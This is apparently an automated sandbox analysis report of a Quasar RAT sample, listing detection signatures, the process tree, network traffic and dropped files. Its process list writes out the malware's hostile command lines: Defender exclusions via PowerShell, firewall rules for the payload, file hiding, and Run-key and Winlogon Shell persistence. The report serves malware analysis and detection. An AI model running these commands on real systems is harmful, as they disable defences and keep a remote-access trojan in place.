Analysis Overview
SHA256
e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa
Threat Level: Known bad
The file e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Modifies Windows Firewall
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Unexpected DNS network traffic destination
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
Runs ping.exe
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-15 00:15
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-15 00:15
Reported
2023-08-15 00:18
Platform
win10-20230703-en
Max time kernel
9s
Max time network
151s
Command Line
Signatures
Quasar RAT
Quasar payload
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
UPX packed file
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa.exe
"C:\Users\Admin\AppData\Local\Temp\e1f792d8bd16f33919f3ddf191e55de285f894457288a071267e034d23d07caa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\nslookup.exe
nslookup myip.opendns.com. resolver1.opendns.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic ComputerSystem get Domain
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
C:\Users\Admin\AppData\Local\Temp\7z.exe
7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\attrib.exe
"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
C:\Users\Admin\AppData\Local\Temp\ratt.exe
"ratt.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 8
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 12
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 13 > nul && "C:\Users\Admin\Music\rot.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 13
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 13
C:\Users\Admin\Music\rot.exe
"C:\Users\Admin\Music\rot.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 222.222.67.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.77.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 94.131.105.161:12344 | N/A | tcp |
| NL | 94.131.105.161:12344 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\ratt.bat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_maykpcua.pca.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\7z.exe
C:\Users\Admin\AppData\Local\Temp\ratt.7z
C:\Users\Admin\AppData\Local\Temp\7z.dll
C:\Users\Admin\AppData\Local\Temp\ratt.exe
C:\Users\Admin\AppData\Local\Temp\Add.ps1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
C:\Users\Admin\Music\rot.exe